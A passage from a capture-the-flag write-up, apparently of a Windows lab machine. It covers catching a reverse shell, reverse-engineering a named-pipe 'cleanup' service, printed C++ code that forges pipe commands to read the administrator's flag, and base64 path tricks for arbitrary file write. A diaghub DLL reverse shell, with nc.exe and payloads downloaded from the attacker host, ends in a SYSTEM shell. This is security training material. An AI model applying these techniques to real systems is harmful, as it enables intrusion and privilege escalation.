After a few seconds we get a hit on our webserver and a reverse shell on our ncat listener.

1
2
3
$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.34.116 - - [13/Aug/2021 08:25:23] "GET /rev.ps1 HTTP/1.1" 200 -

Now we can grab the user flag in web’s desktop.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ sudo rlwrap nc -lnvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.34.116.
Ncat: Connection from 10.129.34.116:49415.
Windows PowerShell running as user web on PROPER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\licenses> whoami
proper\web
PS C:\inetpub\wwwroot\licenses> cat \users\web\desktop\user.txt | measure -c

Lines Words Characters Property
----- ----- ---------- --------
                    32

System

Flag read

Looking around on the file system there are two custom binaries in the C:\program files\cleanup folder.

1
2
3
4
5
6
7
8
9
10
11
PS C:\inetpub\wwwroot\licenses> ls '\program files\cleanup'


    Directory: C:\program files\cleanup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/15/2020   4:03 AM        2999808 client.exe
-a----       11/15/2020   9:22 AM            174 README.md
-a----       11/15/2020   5:20 AM        3041792 server.exe

Executing the client it seems to clean out the downloads folder of the current user.

1
2
1
2
PS C:\program files\cleanup> .\client.exe
Cleaning C:\Users\web\Downloads

To examine the files further we copy them both to our machine using smb.

1
2
3
PS C:\program files\cleanup> cp '\program files\cleanup\client.exe' \10.10.14.65\files\client.exe
PS C:\program files\cleanup> cp '\program files\cleanup\server.exe' \10.10.14.65\files\server.exe
PS C:\program files\cleanup> cp '\program files\cleanup\README.md' \10.10.14.65\files\README.md

The README.md confirms the cleaning of files and also states that the project is still in the Alpha phase.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ cat README.md
# Cleanup

We find the garbage on your system and delete it!

## Changelog

- 31.10.2020 - Alpha Release

## Todo

- Create an awesome GUI
- Check additional paths

Opening up the client.exe we can retrieve a possible additional parameter with 0x522d which is R- in ASCII meaning the string -R.

ghidra_restore

The easiest way to avoid “unexpected” results is to take a snapshop of the windows vm or backing up the Downloads folder before following along with the next steps. What the client.exe does is to move and encrypt all files in the downloads folder of the current user to C:\programdata\cleanup. All the files are restorable but if the folder contains a lot of files it might a bit of a pain to restore them.

Running the server on our own windows machine nothing seems to happen yet.

1
PS C:\Users\jack\Desktop\proper > .\server.exe

The client is using named pipes to communicate with the server. A good tool to analyze this is ioninja. You can also sign up for a free trial period. We create a new session and select Pipe Monitor. After starting the capture we start the server and see it is creating a named pipe to listen.

pipe_server_io

In this case the downloads folder only contains a desktop.ini and a freshly created test file.

1
2
3
4
5
6
7
8
9
10
PS C:\Users\jack\Downloads > ls


    Directory: C:\Users\jack\Downloads


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/15/2021  10:10 AM            282 desktop.ini
-a----         8/13/2021  10:10 AM             16 test

After running the client we can see at the server it cleaned our desktop.ini.

1
2
3
PS C:\Users\jack\Desktop\proper > .\client.exe
Cleaning C:\Users\jack\Downloads
COMMANDO 8/13/2021 10:11:31 AM

1
2
PS C:\Users\jack\Desktop\proper > .\server.exe
CLEAN C:\Users\jack\Downloads\desktop.ini

Looking at ioninja we see the exact command being sent to the cleanupPipe the server created.

clean_ioninja

Restoring the same file again shows the command being sent to the pipe to restore.

ioninja_restore

To continue testing we have to change the file creation date of desktop.ini to the past again since it got newly created with the restore.

1
PS C:\Users\jack\Desktop\proper > Set-ItemProperty -path C:\users\jack\downloads\desktop.ini -name lastwritetime -value ((get-date).adddays(-180))

To see where the file actually ends up we can use procmon and monitor for CreateFile events running the client again. This leads to the C:\ProgramData\Cleanup directory.

procmon_create

Checking the directory we see some file with its name in base64.

1
2
3
4
5
6
7
8
9
PS C:\ProgramData\Cleanup > ls


    Directory: C:\ProgramData\Cleanup


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/13/2021  10:27 AM           1184 QzpcVXNlcnNcamFja1xEb3dubG9hZHNcZGVza3RvcC5pbmk=

Decoding it results in the former name of the file getting cleaned.

1
2
$ echo -n QzpcVXNlcnNcamFja1xEb3dubG9hZHNcZGVza3RvcC5pbmk= | base64 -d
C:\Users\jack\Downloads\desktop.ini

To test if we are able to restore to another place on the filesystem, we base64 encode another path and copy the cleaned file to this encoded path name.

1
2
$ echo -n 'C:\users\jack\desktop\proper\test' | base64
QzpcdXNlcnNcamFja1xkZXNrdG9wXHByb3Blclx0ZXN0

1
PS C:\ProgramData\Cleanup > cp .\QzpcVXNlcnNcamFja1xEb3dubG9hZHNcZGVza3RvcC5pbmk= QzpcdXNlcnNcamFja1xkZXNrdG9wXHByb3Blclx0ZXN0

Next we restore the original filepath and the test filepath.

1
2
3
4
PS C:\Users\jack\Desktop\proper > .\client.exe -R C:\users\jack\desktop\proper\test
Restoring C:\users\jack\desktop\proper\test
PS C:\Users\jack\Desktop\proper > .\client.exe -R C:\Users\jack\Downloads\desktop.ini
Restoring C:\Users\jack\Downloads\desktop.ini

Checking the hashes for both files they are identical which means we can sucessfully place files somewhere else on the system.

1
2
3
4
5
6
7
8
9
10
11
12
PS C:\Users\jack\Desktop\proper > Get-FileHash -Path C:\users\jack\desktop\proper\test -Algorithm md5

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
MD5             3A37312509712D4E12D27240137FF377                                       C:\users\jack\desktop\proper\test

PS C:\Users\jack\Desktop\proper > Get-FileHash -Path C:\users\jack\downloads\desktop.ini -Algorithm md5

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
MD5             3A37312509712D4E12D27240137FF377                                       C:\users\jack\downloads\desktop.ini

To abuse this to read arbitratry files we need to send a custom CLEAN command to the named pipe. For this we create a small executable using C++. All this does is send a CLEAN command as seen before in ioninja to the pipe, cleaning up root.txt.

build_vsstudio

pipe.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <iostream>
#include <Windows.h>

int main()
{
	LPCWSTR pipeName = L"\\.\pipe\cleanupPipe";
	HANDLE serverPipe;
	BOOL isPipeConnected;
	char message[] = "CLEAN C:\users\administrator\desktop\root.txt\n";
	DWORD messageLength = strlen(message) * 2;
	DWORD bytesWritten = 0;

	std::wcout << "Creating named pipe " << pipeName << std::endl;
	serverPipe = CreateFile(pipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

	isPipeConnected = ConnectNamedPipe(serverPipe, NULL);
	if (isPipeConnected)
	{
		std::wcout << "Incoming connection to " << pipeName << std::endl;
	}
	std::wcout << "Sending message: " << message << std::endl;
	WriteFile(serverPipe, message, messageLength, &bytesWritten, NULL);
	return 0;
}

After compiling the code with visual studio we transfer it to the target and run the binary.

1
2
3
4
PS C:\windows\system32\spool\drivers\color> iwr http://10.10.14.65/Proper.exe -o Proper.exe
PS C:\windows\system32\spool\drivers\color> .\Proper.exe
Creating named pipe \.\pipe\cleanupPipe
Sending message: CLEAN C:\users\administrator\desktop\root.txt

Checking in C:\programdata\cleanup there is indeed a cleaned up file and decoding the filename it looks like it worked.

1
2
3
4
5
6
7
8
9
PS C:\windows\system32\spool\drivers\color> ls \programdata\cleanup


    Directory: C:\programdata\cleanup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/13/2021   2:00 AM            192 QzpcdXNlcnNcYWRtaW5pc3RyYXRvclxkZXNrdG9wXHJvb3QudHh0

1
2
$ echo -n QzpcdXNlcnNcYWRtaW5pc3RyYXRvclxkZXNrdG9wXHJvb3QudHh0 | base64 -d
C:\users\administrator\desktop\root.txt

All we need to do now is encode another filepath we have access to and copy the file to this.

1
2
$ echo -n 'C:\users\web\documents\rootflag' | base64
QzpcdXNlcnNcd2ViXGRvY3VtZW50c1xyb290ZmxhZw==

1
PS C:\windows\system32\spool\drivers\color> cp C:\programdata\cleanup\QzpcdXNlcnNcYWRtaW5pc3RyYXRvclxkZXNrdG9wXHJvb3QudHh0 C:\programdata\cleanup\QzpcdXNlcnNcd2ViXGRvY3VtZW50c1xyb290ZmxhZw==

After running the client with the restore option the rootflag is now freely accessible to us.

1
2
PS C:\windows\system32\spool\drivers\color> cd '\program files\cleanup'
PS C:\program files\cleanup> .\client.exe -R C:\users\web\documents\rootflag

1
2
3
4
5
PS C:\program files\cleanup> gc C:\users\web\documents\rootflag | measure -c

Lines Words Characters Property
----- ----- ---------- --------
                    32

System shell

We proved earlier that we have arbitrary file write on the system. One way to abuse this is by using the diaghub repository on xct’s github. We only change the WinExec function in the dllmain.cpp to send a reverse shell instead of creating a bind shell and compile the project.

build_diaghub

Next we transfer all the files to the machine including a nc binary to send the shell.

1
2
3
PS C:\windows\system32\spool\drivers\color> iwr http://10.10.14.65/nc.exe -o nc.exe
PS C:\windows\system32\spool\drivers\color> iwr http://10.10.14.65/diaghub.exe -o diaghub.exe
PS C:\windows\system32\spool\drivers\color> iwr http://10.10.14.65/xct.dll -o C:\users\web\downloads\xct.dll

To “clean” the dll we have to place it in the downloads folder and change its creation date to the past.

1
PS C:\windows\system32\spool\drivers\color> Set-ItemProperty -path C:\users\web\downloads\xct.dll -name lastwritetime -value ((get-date).adddays(-180))

Next we run the client again and check the dll got cleaned.

1
2
1
2
PS C:\program files\cleanup> .\client.exe
Cleaning C:\Users\web\Downloads

1
2
3
4
5
6
7
8
9
10
11
PS C:\program files\cleanup> ls \programdata\cleanup


    Directory: C:\programdata\cleanup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/13/2021   2:00 AM            192 QzpcdXNlcnNcYWRtaW5pc3RyYXRvclxkZXNrdG9wXHJvb3QudHh0
-a----        8/13/2021   2:17 AM          41016 QzpcVXNlcnNcd2ViXERvd25sb2Fkc1x4Y3QuZGxs
-a----        8/13/2021   2:17 AM           1184 QzpcVXNlcnNcd2ViXERvd25sb2Fkc1xkZXNrdG9wLmluaQ==

Verifying the correct file we encode the new filepath to be in C:\windows\system32 and copy the file to this pathname.

1
2
$ echo -n QzpcVXNlcnNcd2ViXERvd25sb2Fkc1x4Y3QuZGxs | base64 -d
C:\Users\web\Downloads\xct.dll

1
2
$ echo -n 'C:\windows\system32\xct.dll' | base64
Qzpcd2luZG93c1xzeXN0ZW0zMlx4Y3QuZGxs

1
cp C:\programdata\cleanup\QzpcVXNlcnNcd2ViXERvd25sb2Fkc1x4Y3QuZGxs  C:\programdata\cleanup\Qzpcd2luZG93c1xzeXN0ZW0zMlx4Y3QuZGxs

Now we can restore it and verify it actually exists inside C:\windows\system32.

1
2
3
4
5
6
7
8
9
10
PS C:\program files\cleanup> .\client.exe -R C:\windows\system32\xct.dll
PS C:\program files\cleanup> ls C:\windows\system32\xct.dll


    Directory: C:\windows\system32


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/13/2021   2:28 AM          10240 xct.dll

All that is left to do now is to set up a listener on the port we specified and to run the dll with diaghub.exe like outlined in the github repository.

1
2
3
4
$ sudo rlwrap  nc -lnvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

1
2
3
4
5
6
7
PS C:\windows\system32\spool\drivers\color> .\diaghub.exe c:\ProgramData\ xct.dll
[+] CoCreateInstance
[+] CoQueryProxyBlanket
[+] CoSetProxyBlanket
[+] CreateSession
[+] CoCreateGuid
[+] Success

This leads to a shell as nt authority\system on the target.

1
2
3
4
5
6
7
8
9
10
11
$ sudo rlwrap  nc -lnvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.34.116.
Ncat: Connection from 10.129.34.116:49645.
Microsoft Windows [Version 10.0.17763.1728]
(c) 2018 Microsoft Corporation. All rights reserved.

PS C:\windows\system32> whoami
nt authority\system